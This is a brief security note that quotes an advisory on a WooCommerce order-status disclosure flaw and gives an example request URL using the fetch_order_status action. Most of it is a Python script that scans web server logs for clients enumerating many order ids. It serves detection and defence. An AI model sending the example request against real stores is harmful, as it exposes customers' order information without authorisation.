“The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action.”
https://example.com/wp-admin/admin-ajax.php?action=fetch_order_status&order_id=XX
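One way to spot lookups across many orders in web server logs, as an added example that is not part of the advisory or the plugin. It assumes the requests arrive as GET with the query string logged in Combined Log Format; the function names, the threshold and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2021:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=101 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2021:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=102 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2021:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=103 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2021:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=104 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2021:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=105 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2021:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=88 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2021:10:06:00 +0000] "GET /wp-admin/admin-ajax.php?action=fetch_order_status&order_id=88 HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2021:10:07:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
not a log line
"""

# Client IP and request target from a Combined Log Format line.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3} ')


def order_status_lookups(log_text):
    """Yield (client_ip, order_id) for each fetch_order_status request."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query)
        if params.get("action") != ["fetch_order_status"]:
            continue  # other AJAX actions are out of scope
        for order_id in params.get("order_id", []):
            yield m.group("ip"), order_id


def flag_enumeration(log_text, max_distinct=3):
    """Return {ip: sorted order ids} for clients that queried more than
    max_distinct different orders (threshold is an assumption to tune)."""
    seen = defaultdict(set)
    for ip, order_id in order_status_lookups(log_text):
        seen[ip].add(order_id)
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) > max_distinct}


if __name__ == "__main__":
    for ip, ids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip} queried {len(ids)} distinct orders: {', '.join(ids)}")
```

Requests sent as POST carry the parameters in the body, which standard access logs do not record, so this check only covers query-string requests like the one shown above.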